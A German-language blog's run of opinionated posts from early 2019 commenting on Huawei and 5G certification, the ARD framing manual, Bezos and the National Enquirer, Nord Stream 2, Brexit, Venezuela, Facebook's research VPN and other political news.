Ich bin Grabungstechnikerin für eine archäologische Grabungsfirma, naturgemäß habe ich dadurch viel mit Baggerarbeiten zu tun. In den letzten zehn Jahren ist mir kein Baggerfahrer untergekommen, der einfach mal so in den Boden haut, v. a. nicht in Innenstädten. Was noch viel wichtiger ist:
selbst wenn die Informationen über die Lage von Versorgungsleitungen eingeholt wurde, heißt das nicht, daß man an entsprechenden Stellen drauflosbaggern kann. Bei meinen Innenstadtgrabungen wurde buchstäblich nicht ein einziges Loch aufgemacht, wo nicht irgendwelche Leitungen drin waren, die auf keinem Plan verzeichnet waren. Bei uns ist nie was passiert, weil unsere Fahrer immer vergleichsweise vorsichtig arbeiten müssen, aber es war doch immer lustig mitanzusehen, wenn dann die Leute von allen möglichen Versorgern um das Loch rumstanden und sich fragten, wem diese Leitung nun gehört und ob die noch aktiv ist oder nicht. Letzteres ist besonders schön, wenn es sich um eine 10kV-Stromleitung (gern auch höher) handelt. Daß in den Plänen verzeichnete Leitungen gern auch mal nicht an der Stelle liegen, wo sie es laut Plan sollten, ist noch einmal ein ganz anderer Punkt. Also, wie gesagt, dem Baggerfahrer hier die alleinige Schuld zuzuweisen widerstrebt mir sehr, ob es wirklich so war, wird man nie erfahren.
Und als Detail am Rande: Hier ist eine Preisliste für den Zugang zu den "wo Kabel verlegt sind"-Daten, falls jemand befürchtet hat, dass da aus Kostengründen nicht nachgeguckt wurde. Das können wir glaube ich ausschließen.
Update: Das war in diesem Fall kein Bagger sondern ein Bohrer. Vorsichtig baggern kann man machen, vorsichtig bohren eher nicht so. Stellt sich die Frage, was man als Bohrer-Betreiber hätte tun können. Metalldetektor? Bodenradar? Wieviel Reichweite hat sowas? Wären diese Kabel überhaupt in den Plänen gewesen? Waren da noch mehr Kabel gewesen als in den Plänen standen? Ich höre gerade, dass es auch kein Feedback gibt, d.h. wenn beim Buddeln Kabel gefunden werden, updated niemand die Pläne.

Sun Feb 17 2019

[l] 1939 fand in New York, im Madison Square Garden, eine Großveranstaltung statt, aus dessen Videoaufnahmen jetzt ein Kurzfilm gemacht wurde (rund 7 Minuten, davon 2 Minuten Vor- und Abspann). Angekündigt als "Pro American Rally" war es eine Art Schulterschluss mit Hitlerdeutschland. Guckt euch das mal an.

Fri Feb 15 2019

[l] Dem Bundestag angegliedert ist eine Organisation namens "Wissenschaftlicher Dienst des Bundestages". Die machen Gutachten. Wenn in der Tagespolitik irgendeine Frage offen ist, dann kann man sich als Abgeordneter an die wenden und dann kriegt man ein Gutachten von Experten aus dem jeweiligen Feld. Die Gutachten gehen leider nur an die Abgeordneten, die angefragt hatten, nicht automatisch an die Öffentlichkeit. Das finde ich persönlich sehr schade, denn meine Vermutung ist, dass in den ganzen Fällen von später vom Verfassungsgericht zurückgerufenen Gesetze der Wissenschaftliche Dienst vorher ausdrücklich und spezifisch gewarnt hat.
Ich erwähne die, weil die auch ein Gutachten zu Venezuela gemacht haben. Dabei kamen sie zu dem Ergebnis, dass … Achtung! Erschütternd! …
In der laufenden Debatte um den venezolanischen Gegenpräsidenten Juan Guaidó hat der Wissenschaftliche Dienst des Bundestages die Anerkennung des Oppositionspolitikers durch die Bundesregierung und weitere westliche Staaten in Frage gestellt. Es gebe "starke Gründe" für die Annahme, dass es sich bei der Anerkennung Guaidós um eine "Einmischung in innere Angelegenheiten" handelt
NEIN!! DOCH!!! OOOOH!!!!
Update: Stimmt gar nicht, die Analysen des Wissenschaftlichen Dienstes werden doch automatisch veröffentlicht. Hatte ich sogar im Blog damals. (Danke, Jens)

Thu Feb 14 2019

[l] Und noch ein Huawei-Leserbrief:
technologisch ist Huawei vllt nicht weiter, aber das Produkt-Portfolio ist größer.
LTE-A ist bis auf ein paar Kniffe quasi identisch mit 5G, dennoch hat man ein paar Verbesserungen bezüglich des Airtime-Managments usw. gemacht um die Nutzung der Kanäle zu verbessern.
Vorallem aber hat man im Standard nicht vorgesehen, dass ein Gerät 4G und 5G gleichzeitig nutzt, Huawei fand das von Beginn an doof.
LTE und 5G können beide Carrier-Aggregation, wo das Endgerät de-facto mit mehreren Zellen gleichzeitig spricht, inzwischen sind das in der Praxis bis zu vier. Aber 5G sieht nicht vor, dass ich ggf. auch asymmetrisch Aggregiere. Also z.B. im Downstream eine 5G Zelle nutze (sagen wir auf 24 GHz) und im Upstream eine "alte" 4G Zelle mit 800 MHz. (Das ist deshalb von Vorteil, weil das Handy die Zelle in der Praxis immer viel besser sieht, als die Zelle das Handy, klar, die Zellen kompensieren die Asymmetrie mit riesen Antennen, aber auf 24 und 30 GHz bringt das aktuell nicht viel, der Up-Stream muss daher häufig auf neuen oder aktuellen Niederfrequenten 800-5000 MHz Frequenzen erfolgen.
Der default hier wäre, dass ich da auch auf 800 MHz meine Zelle upgraden muss, das spült Geld in die Kassen.
Huawei supported aber auch Cross-Tech-CA, also 4G mit 5G zusammen und scheinbar werden das auch die Modems der Fremdhersteller unterstützen.
Außerdem kann man viel es schon in Betrieb befindlichen 4G Equipments einfach recyceln, sofern der Hersteller das vorsieht, und auch das ist bei Huawei der Fall. Deshalb war auch schon für LTE-A die Technik von Huawei so viel interessanter als die von Nokia und Ericsson.
Inzwischen werden die zwei nachgezogen haben, aber ggf. sind die aktuell Politisch gespielten Interessen auch nur die Interessen eines einzelnen US-Anbieters, der einfach kein Huawei-Equipment nutzt und enorme Nachteile hat wenn seine Konkurrenten einfach "upgraden".

Wed Feb 13 2019

[l] Diese Huawei-Nummer wird immer absurder. Aktuelle Gerüchtelage ist, dass unser Heimathorst das TKG ändern will, um Huawei auszuschließen. Das geht so natürlich nicht, da kann man nicht einfach schreiben "Chinesen dürfen nicht liefern", das wäre juristisch angreifbar und offensichtlich wettbewerbsverzerrend. Daher muss man einen Weg finden, wie man das so formuliert, dass es für alle gilt, aber nur Huawei tatsächlich betrifft. Die Lösung des Innenministers?
Demnach sollen künftig die Lieferanten der Netzbetreiber ihre Produkte unter Sicherheitsaspekten zertifizieren lassen und Sicherheitsgarantien abgeben. Diese Auflagen würden dann für alle gelten.
Wie üblich in der Politik klingt das kraftvoll und agil aber ist tatsächlich bloß heiße Luft. Security-Zertifikate gibt es wie Sand am Meer. Die einzigen, die sowas wie eine Aussage haben, sind amtliche Zertifikate nach Common Criteria, die werden dann vom BSI zertifiziert und da gibt es verschiedene Abstufungen (die tatsächliche technische Prüfung führt aber auch das BSI nicht selbst durch sondern beauftragt damit andere). Das Spektrum geht von Bullshit-Blablah über Quellcode-Audits bis hin zu formaler Verifikation. Ich weiß aus zuverlässiger Quelle, dass solche Zertifikate nie verweigert werden, sondern bloß wie beim TÜV Bedingungen gestellt werden, die halt Zeit und Geld kosten, und so eine Zertifizierung braucht dann auch mindestens ein Jahr, so als Hausnummer. Es geht hier um 5G. Die Hersteller sind froh, bei 5G überhaupt was anbieten zu können. Keiner der Hersteller kann da formale Verifikation vorweisen.
Die eigentliche Schranke ist daher meinem Verständnis nach, dass man von Huawei verlangen würde, dass sie ihren Quellcode rausrücken, damit der ordentlich auditiert werden kann. Und in der Tat ist das für viele Branchen und Unternehmen direkt ein Ausschlusskriterium. Allerdings nicht für Huawei. Hauwei hat bereits mit den Briten und Australiern entsprechende Vereinbarungen unterschrieben, und die laufen auch schon seit vielen Jahren. Zwei der Five Eyes hatten also schon Zugriff, dann kann man das auch dem Rest der Welt zeigen. Und in der Tat erzählte mir heute ein Kumpel, dass Huawei in Brüssel ein Cyber Security Zentrum eröffnet hat, wo EU-Regierungen Einblick in den Quellcode nehmen können, und auditieren lassen, bis sie blau anlaufen.
Soviel also zur ersten Seehofer-Anti-Huawei-Forderung. Die ist damit ein Rohrkrepierer. Die zweite war: Sicherheitsgarantien abgeben. Da kann ich ja nur heiser lachen. Wer mein Blog schon länger liest, weiß, wie häufig ich hier aktuelle Cisco-Fuckups verlinke. Cisco ist besonders schlimm, aber die anderen Hersteller sind nicht so viel besser, dass sie ernsthaft Sicherheitsgarantien geben könnten im Sinne von "Sicherheitsschwankungen gibt es nicht, sonst haften wir". Das ist völlig illusorisch. Die kochen alle mit altem Spülwasser. Daher wird damit eher etwas gemeint sein wie "garantiert Updates innerhalb von diesem Zeitrahmen", und das kann Huawei natürlich genau so anbieten wie alle anderen. Das ist also auch ein Rohrkrepierer.
So und jetzt haben wir zwei Möglichkeiten. Entweder unser Horst ist zu blöde, um eine Formulierung zu finden, die Huawei wirklich ausschließt — ooooder unser Horst ist so schlau, den Amis eine Nebelwand-Formulierung hinzulegen, um die ruhigzustellen, damit dann doch alle Huawei kaufen (weil die preislich einfach mal die Hälfte der Konkurrenz aufrufen), und den Amis zu sagen, es tut uns leid, wir haben unser Bestes gegeben. Da bin ich gerade ein bisschen in der Zwickmühle. Ich würde mir natürlich gerne vorstellen, dass unser Innenminister schlau genug ist, die Amis so zu verarschen. Aber … der Seehofer?! Da fehlt mir gerade dir Vorstellungsgabe dafür.
Update: Noch ein Gedanke am Rande: Zertifizierung ist inhaltlich die Antithese zu agiler Softwareentwicklung. Eigentlich ist es schockierend, dass Hersteller das überhaupt mitmachen. Windows hat mal eine Zertifikation gekriegt, und das war dann unter praxisnahen Annahmen wie "hat kein Diskettenlaufwerk und keine Netzwerkkafte". Das ist lange her, sieht man ja schon an den Diskettenlaufwerken, die damals noch üblich waren. Ein Zertifikat ist natürlich wertlos und müsste neu gemacht werden, wenn die Software gepatcht wird. Aber wir patchen schneller als wir ein Zertifikat nachprüfen können. Insofern kann eigentlich grundsätzlich kein Softwareprodukt ein Security-Zertifikat haben oder gar damit werben, das den Namen auch verdient. Entweder das Zertifikat trifft zu, aber dann wurde die Software nicht mehr gepatcht seit dem und ist deshalb unsicher, oder es gab Patches aber dann zertifiziert das Zertifikat nicht die eingesetzte Version und ist damit hinfällig.
Update: Übrigens sei nochmal der Hinweis gestattet, dass wir bei Huawei keinerlei Unterlagen haben, die beweisen würden, dass Geheimdienste Hintertüren einbauen. Bei Cisco gab es solche Unterlagen in den Snowden-Unterlagen.
Update: Und noch eine Bemerkung am Rande: Hier geht es jetzt erstmal nur um 5G, aber bei der Verbreitung in existierenden Netzen (LTE z.B.) ist Huawei sehr stark. Man muss diesen Vorstoß der Amerikaner jetzt also so lesen, dass die den Fuß in die Tür kriegen wollen. Wenn die EU jetzt tatsächlich beschließt, dass Huawei nicht in unserer kritischen Infrastruktur eingesetzt werden darf, dann müsste man ja auch die alte Hardware aus den Racks reißen und durch andere Hardware ersetzen. Wir reden da von Milliardenkosten!
Update: Stellt sich raus: Huawei hat auch in Bonn schon seit November 2018 ein "Security Innovation Lab", wo sie dem BSI Quellcodeanalysen ermöglichen wollen.
[l] Die ARD hat ein "Framing-Manual" erstellen lassen. Das ist ein Begriff aus der Psychologie / Kommunikationswissenschaft / PR / Spindoktor-Branche und meint, dass man bei einer Berichterstattung durch den Kontext und die Wort- und Metaphernwahl lenken kann, in welchem Kontext sie beim Rezipienten einsortiert wird. Ganz plumpes Beispiel: Wenn man an einen Artikel in Einzelhandel dranschreibt, er kostet 100 Euro, streicht das durch und schreibt 20 Euro dran, dann sortiert der Kunde das als "80 Euro gespart" ein, und die Frage, ob dieser Artikel wirklich 20 Euro wert ist, tritt in den Hintergrund. Umgekehrt löst man mit Metaphern wie "Migrantenflut" Assoziationen einer Naturkatastrophe aus, und mit "Ausländerkriminalität" transportiert man diskret die Annahme, dass Kriminalität unter Ausländern besonders häufig oder besonders wichtig ist.
Die häufigere Anwendung in der Politik ist allerdings das positive Framing. Wenn z.B. die offizielle Regierungskommunikation von "Arbeitslosenstatistik" auf "Beschäftigungsstatistik" oder gar "Arbeitsmarktstatistik" umschwenkt, dann wird damit der Aspekt wegretuschiert, dass wir hier über Menschen reden, die keinen Job gefunden haben, und von unserem Hartz-IV-System zu Menschen zweiter Klasse degradiert und gegängelt werden. Oder wenn die Politik davon redet, "ein Gesetz auf den Weg gebracht" zu haben, dann wird damit transportiert, das ein Gesetz sowas wie ein Boot ist, das man vom Stapel lässt, und danach ist halt "in Gottes Hand", was weiter passiert.
Kurz gesagt: Framing ist keine neutrale oder positive Technik. Das ist das Handwerkszeug von Spindoktoren, und die ARD sollte sich was schämen, dass sie ihre Mitarbeiter nach solchen Methoden schult.
Ich finde sehr schön, wie Meedia auch Framing benutzt, um den Ton zu setzen, wenn sie ein Foto der ARD-Generalsekretärin nehmen, wo sie besonders unehrlich zu lächeln scheint, und dann als Bildunterschrift das hier nehmen:
"Jeder darf so reden, wie er oder sie möchte."
Damit wird deutlich kommuniziert, dass das das in Abrede stand oder zumindest nicht klar war.
Es wird in der Mitte auch konkreter, was für Framing-Vorschläge dieses Manual so gemacht hat:
Q: Es werden aber nicht nur Vorschläge gemacht, wie man die ARD und den öffentlichen Rundfunk besser darstellt, sondern es wird auch erklärt, wie man den Privatmediensektor fast schon herabwürdigen kann. Da ist die Rede von “profitwirtschaftlichen Sendern”, von “medienkapitalistischen Heuschrecken”, vom “Kommerzsender”. Diese Begriffe fallen im Manual. Wie beurteilen Sie das?
A: Wir sind gewohnt, immer zu sagen “öffentlich-rechtlich” und “privat”. “Öffentlich-rechtlich” beschreibt aber nur eine juristische Organisationsform, das Pendant wäre “privatrechtlich”. Das wird aber nicht gesagt. Mit “privat” wird eher etwas Privates, Eigenes, Heimeliges verbunden. “Öffentlich-rechtlich” hat eine Konnotation, die für viele nach schwerfälliger Behörde klingt. Für mich war die Erkenntnis ganz wichtig, dass wir hier nicht ehrlich sprechen. Der Begriff “Gemeinwohlmedien” drückt viel besser aus, wofür wir stehen als “öffentlich-rechtlich”. Dass die kommerziell arbeitenden Medienhäuser nun mal kommerziell sind, ist meiner Meinung nach eine ehrliche Bezeichnung und keine herabwürdigende.
Das finde ich ausgesprochen harten Tobak. Besonders weil die angeblichen Gemeinwohlsender ja auch Werbung ausstrahlen (was ich übrigens skandalös finde).

Fri Feb 8 2019

[l] Jeff Bezos äußert sich zur National-Enquirer-Sache. Er sagt, der National Enquirer habe ihn zu erpressen versucht. Entweder die Washington Post stellt ihre Recherchen und Berichterstattung (zu politisch motiviertem Enquirer-"Journalismus", speziell zum Kashoggi-Mord) ein, oder seine privaten SMSsen (und Nacktfotos) werden veröffentlicht.
Nur nur das. Er sagt, die seien sich so sicher gewesen, dass er keine Wahl hat, dass sie ihm das "Angebot" schriftlich gemacht haben. Und er veröffentlicht auch gleich die Erpresser-E-Mail.
Wenn ihr also schon immer mal ein Erpresser-Schreiben an einen Milliardär sehen wolltet, dann ist das jetzt eure Gelegenheit.

Thu Feb 7 2019

[l] Frankreich ist plötzlich gegen die Nord-Stream-II-Pipeline (die heißt wirklich so kaputt, kein Typo). Der Vorgänger Nord Stream war die Pipeline, mit der Russland an Polen, Weißrussland und der Ukraine vorbei die EU beliefern wollte, ohne dass jemand auf dem Weg für den Privatgebrauch Entnahmen tätigt. Die Pipeline ist ökonomisch ein voller Erfolg, die Auslastungsstatistik spricht für sich selbst. Daher sollen da jetzt noch zwei Rohre verlegt werden, um die Kapazität zu steigern. Das ist die berüchtigte Putin-Schröder-Pipeline :-)
Frankreich ist jetzt plötzlich gegen die Pipeline und begründet das wie folgt:
Das von Deutschland unterstützte Projekt des russischen Energiekonzerns Gazprom werfe "strategische Probleme" im angespannten Verhältnis der Europäer zu Moskau auf, erfuhr die Süddeutsche Zeitung aus französischen Regierungskreisen. "Wir wollen nicht die Abhängigkeit von Russland verstärken und dabei noch den Interessen von EU-Ländern wie Polen und der Slowakei schaden", hieß es in Paris.
Das ist einigermaßen faszinierend, denn Frankreich ist Netto-Stropimporteur und hat sich fast vollständig von Atomkraftwerken abhängig gemacht, die in die Jahre gekommen sind und immer häufiger wegen Wartung oder Problemen vom Netz genommen werden mussten. Die Grafik der Stromexporte ist übrigens auch aus anderer Sicht hochinteressant. Deutschland hat auf Stromexportseite fast die Hälfte des Volumens auf sich vereint! Das krasseste Exportvolumen geht an die Schweiz mit 2 TWh (ich vermute, dass die den Strom an Italien und Frankreich weiterverhökern). Ihr erinnert euch sicher noch an die Drohungen, dass bei uns das Licht ausgeht, wenn wir die Kernkraft abschalten? Nun, bei den Fraunhofers gibt es eine interessante Statistik dazu:
Im Januar 2019 produzierten die deutschen Kraftwerke so viel Strom wie nie zuvor. Die Erzeugung lag bei insgesamt 52,3 TWh. […] Die Kernenergie produzierte 6,81 TWh, so viel wie zuletzt im Jahr 2017. […] Auch beim Stromexport gab es einen neuen Rekord. Im Januar 2019 wurde ein Exportüberschuss von 7,2 TWh erzielt (physikalische Flüsse).
Von der Größenordnung her kann man also grob sagen, dass wir die Atomkraftwerke komplett abschalten könnten. Wir tun es aber nicht, weil sich jemand mit den Stromexporten eine goldene Nase verdient. Jemand, der nicht für die Endlagerkosten aufkommt.
Aber zurück zur Pipeline. Hier ist der letzte Absatz aus dem Artikel:
Auch die USA kritisieren Nord Stream 2 immer wieder heftig. Präsident Donald Trump ist ein erklärter Gegner des Projekts. Zuletzt warnte der US-Botschafter in Berlin, Richard Grenell, deutsche Firmen davor, sich an der Pipeline zu beteiligen. Nord Stream 2 habe für die USA und ihre Verbündeten "ernste geostrategische Konsequenzen". Moskau könne seine Energielieferungen damit künftig noch stärker als politischen und wirtschaftlichen Hebel nutzen. Unternehmen, die sich am Bau der Pipeline beteiligten, gingen "signifikante Sanktionsrisiken ein", warnte Grenell.
Meine Vermutung ist daher, dass Macron schlicht gerade mit den Gelbwesten die Hände voll hat und sich so die Amis zumindest kurzfristig vom Hals schaffen will.

Wed Feb 6 2019

[l] The National Enquirer hat neulich ein 12-Seiten-Expose über Jeff Bezos gebracht. Bezos ist der Boss von Amazon und Eigentümer von der Washington Post, die sich deutlich gegen Trump positioniert hat. Der Enquirer ist eine "Elvis lebt!1!!"-Supermarktkassen-"Publikation", die allerdings in letzter Zeit einen gewissen Ruf erworben hat, dass ihre Behauptungen Hand und Fuß haben, insoweit sie lebende Personen betreffen. Die Story, die sie über Bezos brachten, hatte mit seiner Scheidung kürzlich zu tun, und dass er eine Affäre hatte — und sie haben SMSse zwischen ihm und seiner Geliebten publiziert.
Ihr könnt euch vorstellen, dass Bezos gerade etwas ungehalten ist. Es sieht ein bisschen so aus, als würde Bezos jetzt aus dem Enquirer einen Parkplatz machen, wie es der Thiel mit Gawker gemacht hat.
Update: www.nationalenquirer.com ist tot. Die IPs liegen in ... der Amazon Cloud.
Update: Ein Leser weist darauf hin, dass das Geoblocking ist und man per US-Proxy noch auf die Seite kommt.

Mon Feb 4 2019

[l] Das mit Brexit wird ja noch richtig lustig. Das Verhandlungsgeschick der Briten setzt echt Maßstäbe. Hey, jetzt ist doch ein toller Moment, um in Nordirland nach Atommülllagenr zu suchen!1!!
Oh und dann war da noch die WTO. Die diplomatische Delegation von Moldavien hatte letztens von den Briten kein Visum gekriegt und kam nicht rein, und jetzt blockieren die den Zugang Großbritanniens zu den WTO-Ausschreibungen.
Ja gut, wie man sich Freunde macht, das wussten die Briten ja schon immer. Und haben dann gezielt das Gegenteil gemacht. (Danke, Lutz)
[l] Ihr habt vielleicht mitgekriegt, dass es Verwerfungen zwischen Radfems und Trans-Aktivisten zu der Frage gibt, ob Trans-Frauen "echte Frauen" sind. Das hat schon zu einigen Scharmützeln geführt, und jetzt hat sich eine Art "Querfront" gebildet, bei der Radfems ein Panel bei der Heritage Foundation gemacht haben. Das ist ein konservativer Think Tank, bei dem sich sonst Reagan-Fans über Trickle Down Economics unterhalten.
The moderator, Ryan Anderson, said they were speaking at Heritage because no similar liberal or leftist institution would give them space or time to make their case.
Die Frauen haben dort Folgendes vorgetragen:
Together they argued that sex was fundamentally biological, and not socially constructed, and that there is a difference between women and trans women that needs to be respected. For this, they were given a rousing round of applause by the Trump supporters, religious-right members, natural law theorists, and conservative intellectuals who comprised much of the crowd. […]
it calls into question who is actually a woman, and includes in that category human beings who have been or are biologically male, and remain attracted to women. How can lesbianism be redefined as having sex with someone who has a penis, they argue, without undermining the concept of lesbianism as a whole? “Lesbians are female homosexuals, women who love women,” one of the speakers, Julia Beck, wrote last December, “but our spaces, resources and communities are on the verge of extinction.”
Es gibt eine Aufzeichnung der Veranstaltung.
Was meint ihr? Ist das ein Zeichen dafür, dass sich die Intersektionalität selber auffrisst?
Und wie geht es jetzt weiter? Sind die Radfems jetzt die Bösen und können ausgegrenzt werden, weil sie beim Feind ein Podium angenommen haben?
Ich habe ja Intersektionalität schon aus taktischer Sicht nie verstanden. Die Idee der Bildung einer Gruppe zum Protestieren ist doch, dass eine große Gruppe Wucht hat und was ereichen kann. Das macht man doch kaputt, wenn man Untergruppen mit 50 shades of more marginalized than you gründet.
Update: Mehrere Leser haben mir geschrieben, dass Radfem der Oberbegriff ist, und der Begriff für diese Gruppe "TERF" ist. Das steht auch im Artikel. TERF steht für "Trans-Exclusionary Radical Feminist". Ihr könnt euch schon vorstellen, dass das eher ein Schimpfwort als eine Selbstbezeichnung ist, und tatsächlich gibt es auch schon eine schöne Wir-sind-die-Opfer-Webseite, bei der man schön sehen kann, wieviel (und wie schlimmer!) Hass im Feminismus und bei Trans-Aktivisten so unterwegs ist. Heiliger Bimbam. Unter Todesdrohungen tun die es schon gar nicht mehr.

Sun Feb 3 2019

[l] Auch zu Venezuela kommen nach wie vor eine Menge Leserbriefe rein. Einer empfiehlt "The Making of Juan Guaidó: How the US Regime Change Laboratory Created Venezuela’s Coup Leader"
Die Überschrift macht schon klar, dass das keine neutrale Quelle ist. Der Typ, der die Site betreibt, hatte allerdings neulich dieses schöne Video gemacht, wie er im Abgeordnetenhaus Leute fragt, ob sie zu Venezuela einen Kommentar haben.
Hier ein Absatz aus dem Artikel als Teaser:
On October 5, 2005, with Chávez’s popularity at its peak and his government planning sweeping socialist programs, five Venezuelan “student leaders” arrived in Belgrade, Serbia to begin training for an insurrection.
[l] Wisst ihr, wo die Arbeitslosigkeit sinkt, die Wirtschaft boomt, wo Rechtspopulisten abgeschlagen sind und keine Chance haben?
Kommt ihr NIE drauf!
In Portugal. Warte mal, Portugal, Portugal, das waren doch die Pleitiers? Die geografisch sehr ungünstig in der Nähe der Flüchtlinge wohnen, vor denen Europa so viel Angst hat? Die, die alle schon abgeschrieben hatten? Die, die harte Drogen legalisiert haben?
Ja. Und vor allem: Die, die Austerity nicht mitgemacht haben. Sozialstaat stärken statt kürzen.

Thu Jan 31 2019

[l] Was passiert, wenn man "der Zweck heiligt die Mittel" akzeptiert?
Sowas hier.
In Berlin-Neukölln eskalieren die gewaltsamen Auseinandersetzungen zwischen links und rechts. In der Nacht zu Donnerstag haben drei Männer einen Brandanschlag auf den Privatwagen eines AfD-Politikers verübt. Eine Zivilstreife der Polizei konnte einen der verdächtigen Männer fassen. Bei dem 39-Jährigen handelt es sich nach Tagesspiegel-Informationen um einen Rechtsextremismus-Experten und Autor.
Oooh, ein Rechtsextremismus-Experte, ja?
Der Mann, der in den nächsten Tagen 40 Jahre alt wird, war Mitarbeiter der Amadeu Antonio Stiftung und der Mobilen Beratung gegen Rechtsextremismus Berlin (MBR).
Die Amadeu Antonio Stiftung distanziert sich von dem Mann und legt Wert darauf, dass der nie festangestellt war sondern nur auf Honorarbasis für sie gearbeitet hat.
„Wir verurteilen diese Straftat auf Schärfste, wie wir auch alle anderen Formen von politischer Gewalt verurteilen. Gewalt ist kein Mittel der politischen Auseinandersetzung, egal aus welcher Richtung sie kommt.“
Das finde ich sehr schön, dass sie das so sehen. Jetzt muss nur noch die Transferleistung kommen, dass Gewalt gegen Andere erst durch Entmenschlichung, Hass und Ausgrenzung möglich wird. Auch Nazis müssen sich erst in Rage hassen, bevor sie Gewalt gegen Ausländer durchführen können, besonders gegen wehrlose Ausländer wie Frauen und Kinder. Nur krasse Psychopathen können einfach so Gewalt ausüben. Normale Menschen brauchen jahrelanges Weltbild-Zurechtlegen. Die Militärs haben da faszinierende Studien zu gemacht, was man tun muss, damit normale Rekruten andere Menschen umbringen können.
Auf der linken Seite ist es auch so, dass niemand einfach loszieht und Autos anzündet. Der muss sich vorher das Weltbild sorgfältig so zurechtgezimmert haben, dass die da drüben die Bösen sind, gegen die solche Mittel gerechtfertigt sind. Das braucht viel Zeit. Was für ein Klima herrscht bei der Stiftung, dass jemand sich bis zur Gewaltausübung radikalisieren kann, ohne dass das auffällt und wer einschreitet?
Ist das unter Nazi-Experten verbreitet?
Der Verdächtige hat zudem Beiträge für die Bundeszentrale für politische Bildung verfasst.
Oh wow, was für ein Totalschaden.
Nach Angaben der Bundeszentrale aus dem Jahr 2014 war er für Projekte des Vereins für Demokratische Kultur in Berlin (VDK) tätig und hat zu dieser Zeit für die MBR gearbeitet.
Und jetzt tun alle so, als ob das halt ein verwirrter Einzeltäter ist, der sich still und leise in seinem Kämmerlein radikalisiert hat. Damit wir bloß nicht über die sich ansonsten stellenden Fragen reden müssen.
[l] Angesichts der Temperaturen in den USA könnte man ja, wenn man an sowas glaubt, sich fast denken: Die Natur hat so langsam alles durch, was sie gegen Trump bringen konnte. Die USA hatten Flächenbrände, Erdbeben, Hurricanes, jetzt den Blizzard, Krankheiten brachen aus … und Trump ist immer noch im Amt.
So spirituell wie die Amis in Umfragen immer sind, frage ich mich ernsthaft, wieso die das nicht aus der Perspektive sehen. Wenn die Natur jetzt eskaliert, bis Trump weg ist, kommen als nächstes Vulkanausbrüche und Meteoreinschläge.
Vielleicht brauchen die was biblischeres?
Gucken wir doch mal.
Wasser wird rot wie blut. Check.
Froschplage. Check.
Flohplage. Check.
Schlangenplage? Check.
Stechmücken und -fliegen sind ja nie wirklich weggegangen.
Viehpest betrifft uns nicht mehr. Geflügel wird gar nicht mehr alt genug, um die Inkubationszeit typischer Krankheiten mitzuerleben. Und bei Schweinen und Rindern werden Krankheiten einfach gemanaged, wir hatten ja gerade erst den Gammelfleischskandal in Polen. Check.
Die Geschwür-Plage decken wir mit den Anti-Vaxer-Masern ab.
Hagel. Check.
Bei den Heuschrecken nehmen wir einfach Wall Street und ihre Hedgefonds.
Finsternis? Stromausfälle gibt es mehr als genug.
Bleibt der Tod der Erstgeborenen. 9/10. Wieso werden die Fundichristen da nicht langsam nervös?
Update: Wie sich rausstellt: Nein. Die glauben, Gott haben Trump geschickt. Glaube ich auch. Ich meine es nur anders. :-)

Wed Jan 30 2019

[l] Wenn es demnächst weniger Kritik an Facebook gibt, dann könnte das daran liegen, dass Facebook die Portokasse aufgemacht hat und einige der wichtigsten Kritiker schlicht gekauft hat. Hoffentlich zahlen sie wenigstens gut bei dem Schweigegeld.
Ich hoffe mal, Max Schrems kriegen sie nicht auch irgendwann so weg.
[l] Facebook bezahlte Teenager dafür, ihr Privatleben online durch ein Facebook-Schnüffel-VPN zu routen, schön mit Root-Zertifikat zum SSL-Aufknacken. Die Rede ist hier von einer Iphone-App namens "Facebook Research", in der Außendarstellung "Project Atlas" (der Name Facebook ist halt verbrannt). Facebook hat das früher mit einer App namens "Onavo Protect" gemacht, aber die hat Apple wegen ihres Schnüffel-Verhaltens aus dem Appstore geschmissen. Daher jetzt die Umbenennung als Tarnkappe.
Falls sich jetzt jemand denkt: Haha, ich nehm Android, betrifft mich nicht: Die Onavo-App ist auf Android gar nicht erst aus dem Play Store geschmissen worden.
Update: Oh gucke mal, das ging ja fix: Facebook will shut down its controversial market research app for iOS.
[l] Die Bundestagsfraktion der Linkspartei hatte zum Neujahrsempfang ausgerechnet Richard Grenell eingeladen, den Grinsemann, den Trump als Botschafter nach Deutschland geschickt hat, und der sich hier reihum bei allen unbeliebt gemacht hat — außer anscheinend bei der Linkspartei. Die Junge Welt ist darüber jetzt ein bisschen ungehalten :-) (Danke, Frank)
[l] Angesichts der aktuellen Lage fragt man sich ja, wieso eigentlich überhaupt noch Medienpreise verliehen werden. Neben Relotius-Skandal (der ja auch diverse Preise verliehen bekommen hatte) und sinkenden Reichenweiten und Paywalls gibt es an "Neuerungen" nur so Ideologie-Plattformen wie den "ARD Faktenfinder". Ich sehe da weit und breit keinen Grund zu feiern.
Jedenfalls vergibt auch der Bundestag einen Medienpreis. Ich hatte von dem noch nie was gehört, aber angeblich gehört der zu den "renommierten Auszeichnungen für Journalisten". Ich als Journalist würde mich ja schämen, von einem staatlichen Organ gefeiert zu werden. Wie sieht das denn aus? "Du warst immer schön artig und unkritisch", so sieht das aus!
Aber das war nicht der Punkt. Der Punkt war: Don Alphonso ist in die Jury berufen worden. Und der Deutschlandfunk hat mal eine Umfrage unter den ganzen Leuten gemacht, die deshalb jetzt Hämorrhoiden gekriegt haben.
An dieser Stelle möchte ich mal Arne "Cyberclown" Schönbohm loben, den BSI-Direktor, der auf die gehässige Kritik zu seiner Ernennung genau richtig reagiert hat: Gar nicht. Wenn ein Politiker sich über irgendeinen Internet-Kritiker da draußen aufregt, dann ist das in erster Linie eine Aufwertung von dem Kritiker, keine Abwertung. Gut, Frau Roth ist jetzt noch nicht allzu häufig durch ihre Kompetenz aufgefallen, aber ich hätte gedacht, dass sie DAS verstanden hat. Wie lange ist die jetzt in der Politik? Gefühlt 40 Jahre? Und dann so ein Anfängerfehler? Meine Güte.
Irgendein selbsternannter Selbstdarstellungs-Experte findet sich auf Twitter immer, aber die Vizepräsidentin des Bundestags? Wow. Merkt die nicht, dass erst durch ihre persönliche Kritik der Don für Außenstehende satisfaktionsfähig aussieht?
Aber auch aus anderer taktischer Sicht ist das nicht sehr klug. Nehmen wir mal an, dass der Don da aus Proporzgründen hingeschickt wurde (ich habe da keinen Einblick, aber könnte mir das vorstellen), damit da überhaupt ein Konservativer in der Jury sitzt. Wenn dann die Roth meckert, dass der zu viele ihr nicht gefallende Dinge gesagt hat, bestätigt sie damit doch den Ernennern, dass sie den Richtigen für den Job gefunden haben!
Oder die spielen über Bande und die Roth ist super froh, dass da der Don sitzt. Könnt ihr euch ja selber überlegen, was ihr für die wahrscheinlichste Variante haltet.
